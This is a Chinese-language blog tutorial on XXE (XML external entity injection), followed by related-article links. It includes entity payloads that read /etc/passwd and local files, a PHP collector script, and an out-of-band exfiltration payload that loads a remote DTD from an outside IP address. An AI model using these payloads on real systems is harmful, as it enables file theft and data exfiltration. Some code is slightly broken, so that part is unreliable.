XXE-实体注入

最新推荐文章于 2023-12-28 16:21:23 发布
最新推荐文章于 2023-12-28 16:21:23 发布
阅读量133 收藏
点赞数
分类专栏: Web渗透测试
原文链接:https://blog.csdn.net/slismy/article/details/112762007
版权

XXE-实体注入

一、什么是XXE?

用户输入的数据被当做XML代码执行

XXE是XML实体注入,我们利用XML中DTD部分可以从外获取数据的特点,通过发起请求、操作协议的方法,对目标的内网进行探测。

二、XML是什么?

1、XML是一种可拓展的标记语言,很类似与HTML
2、XML用于传输数据
3、XML没有被预定义,所有的东西都需自己定义(任何标签都没有任何意义)
预定义:预先定义好的东西。
XML可以自己发明标签
4、XML仅仅是纯文本,他不会做任何事情
5、XML的定义:存储数据的东西(动态语言可以去XML存入数据、提取数据)

XML结构

XML声明

<?xml version”1.0” encoding”utf-8”?>

DTD部分
1.定义一个经常使用的内容为变量用于引用(本质是一个静态的东西)
2.XML本身只存储,所以需要后端代码来调用
3.定义的时候可以去外部读取数据然后定义实体
=>外部获取数据[发起请求,可以操作协议]
4.XML的代码中DTD部分可以去调用函数

<!DOCTYPE foo [
 <!ELEMENT foo ANY>
 <!ENTITY xxe SYSTEM "file:///ect/passwd" >]>

XML内容部分

<foo>&xxe;</foo>

三、重点函数

php中存在一个叫做simplexml_load_string的函数用来处理XML,将XML中的东西转换成对象,通过控制该对象来任意执行XML。

<?php 
	$test = '<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///c:/1.txt">]><scan>&test;</scan>';
	$obj = simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
	print_r($obj);
?>

把test 存储的数据从c:/1.txt中提取

XXE漏洞利用具体操作

通常我们无法看见XML数据读取或存储的反应,所以需要我们想办法去外带数据

由于DTD可以发起http请求,我们就利用自己搭建的站点来把数据带出来。

我们可以写一个简单的代码利用传参来外带数据,例如:

<?php
file_put_contents("1.txt",$GET["id"],FILE_APPEND);
?>

当有人访问你的网站

http://www.xxx.com/1.php?id=aaaaa

数据aaaaa就被写入1.txt的文件。

所以我们接下来我们要做的步骤是:
1、先获取我们要拿的数据
2、把拿到的数据拼接到http://www.xxx.com/1.php?id=
3、执行拼接好的url

为了实现这些,我们需要搭建一个炮台来发起攻击。以下是炮台代码。

<?php
$test = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY[
<!ENTITY %file SYSTEM "php://filter/read=convert.base64-encode/resource=c:/1.txt">
<!ENTITY % remote SYSTEM "http://192.168.32.146/xxe/1.xml">
%remote;
%sent;
]>
EOF;
$obj = simplexml_load_string($test,'SimpleXMLElement',LIBXML_NOENT);
?>

XXE-扩展

<!ENTITY 实体名称 SYSTEM "URI/URL">

外部引用可支持http,file等协议。

j0101_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XXE - 实体注入
净邪的博客
06-26 1278
什么是xxeXXE = XML External Entity 即外部实体,从安全角度理解成XML External Entity attack XML外部实体注入攻击 典型的攻击如下: 定义实体必须写在DTD部分 拆分开来简单点来说就是: XML: 官方介绍: XML 指可扩展标记语言(EXtensible Markup Language) XML 是一种标记语言,很类似 HTML XML 的设计宗旨是传输数据,而非显示数据 XML 标签没有被预定义。您需要自行定义标签。.
WEB安全的总结学习与心得(十三)——XXE实体注入漏洞
weixin_44681434的博客
01-29 357
WEB安全的总结与心得(十三) 01 文件操作 操作内容 文件上传 上传Webshell;上传木马 文件下载 下载系统任意文件;下载程序代码 常见文件操作漏洞 文件上传漏洞;任意文件下载漏洞;文件包含漏洞 02 ...
XXE外部实体引用注入的原理及利用
cike_y
02-17 617
XXE又称为XML,它是可扩展标记语言(Extensible Markup Language)的缩写,它是一种数据表示格式,常用于传输和存储数据。
漏洞总结——XXE(XML外部实体注入
Spontaneous_0的博客
09-08 463
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞。
xxe实体注入
qq_42307546的博客
01-25 1575
XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入 由于 xxe 漏洞主要是利用了 DTD 引用外部实体导致的漏洞,那么重点看下能引用哪些类型的外部实体。当 libXML <libxml2.9 才会造成外部注入漏洞。 XXE漏洞代码分析 &l
xxe-injection-payload-list::bullseye:XML外部实体XXE注入有效负载列表
02-06
4. **数据注入**:通过XML实体注入,将服务器端计算结果暴露给攻击者。 **四、XXE防范措施** 1. **禁用外部实体**:在XML解析器配置中禁用或限制外部实体加载。 2. **验证输入**:对所有XML输入进行严格的验证和...
WebGoat8-xxe注入漏洞分析
09-15
XXE 注入漏洞是基于 XML 外部实体的攻击,攻击者可以通过构造特殊的 XML 实体来读取服务器上的敏感信息。XML 外部实体是 XML 1.0 中的一种特性,允许开发者在 XML 文档中引入外部实体,以便在 XML 文档中使用外部...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
WEB安全之XXE实体注入漏洞.pdf
12-12
然而,XML的这种灵活性也引入了安全风险,如XXE(XML External Entity Injection,XML外部实体注入漏洞)。 **0x01 XML基础知识** XML文档由XML声明、DTD(Document Type Definition)文档类型定义(可选)和文档...
测试XXE注入.docx
09-06
XXE 注入(XML 外部实体注入)是一种类型的注入攻击,它会影响解析 XML 文件的应用程序。攻击者可以通过构造恶意的 XML 文件,使用外部实体来引用文件系统中的文件或网络资源,从而导致读取任意文件、执行系统命令、...
XML外部实体引用(XXE,XML External Entity attack)漏洞原理及其预防
qq_gfq的博客
03-26 5583
0x00 什么是XMLXML 指可扩展标记语言(EXtensible Markup Language),是一种用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。和HTML类似,但HTML被设计来显示数据,XML被设计来传输数据。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。https://mp.csdn....
【网络安全】web漏洞-xml外部实体注入(XXE)
最新发布
A1_3_9_7的博客
12-28 1099
xml可拓展标记语言:xml是一种可拓展的标记语言,可以用来存储数据,例如:我们经常看到一些.xml的文件;它还可以用来传输数据,我们可以直接将数据以xml的格式放在请求当中,发给服务器。XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。
XXE 实体注入
guishengyx的博客
04-27 240
服务器因为你的传参发送数据包 我的传参为什么会让服务器发送数据包? 翻译网页功能如何实现 翻译网站直接替代我们去访问目标站点,然后获得内容后查询英文对应,然后处理完返回给用户 典型的SSRF:用户传参然后服务器去访问 SSRF危害: 访问内网(外紧内松) 隐藏攻击者(当做跳板机来躲避追踪) 攻击目标本机(dict:// file:// 读取文件)(有些网站对127.0.0.1的访问不设防) ...
XXE实体注入漏洞详解
qq_41679358的博客
08-24 3728
本文转自行云博客https://www.xy586.top/ 文章目录什么是XXE原理XXE漏洞带来的的危害什么是 XML寻找XXEXXE的防御示例 什么是XXE XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。 原理 既然XML可以从外部读取DTD文件,那我们就自然地想到了如果将路径换成另一个文件的路径,那么服务器在解析这个XML的时候.
【WEB漏洞原理】XML&XXE利用检测绕过
过期的秋刀鱼
09-14 839
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害XXE是XML的一个漏洞XXE产生根本原因:网站接受XML数据,没有对xml进行过滤。
XML实体注入
weixin_55190422的博客
09-25 466
XML实体注入 首先介绍下基础知识把 XML大体格式如下: 接下来我以一个题目讲解 首先题目已经告诉我们了这是一道关于XML的题目 那么怎么做呢 我们打开靶机发现是一个登录界面 我们审查网页源代码 发现里面还有个dologin.php类似于PHP源码。所以我们考虑BP抓包发现是个XXE漏洞Accept: application/xml, text/xml, */*; q=0.01 X-Requested-With: XMLHttpRequest 我们用这个格式payl
关于xxe外部实体安全
04-27
XXE攻击是指攻击者通过XML实体注入漏洞,向应用程序中注入恶意的XML实体数据,从而导致应用程序解析XML实体时,触发攻击者构造的恶意行为。其中,外部实体注入攻击是XXE攻击中最常见的一种方式。 为了防止XXE攻击中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值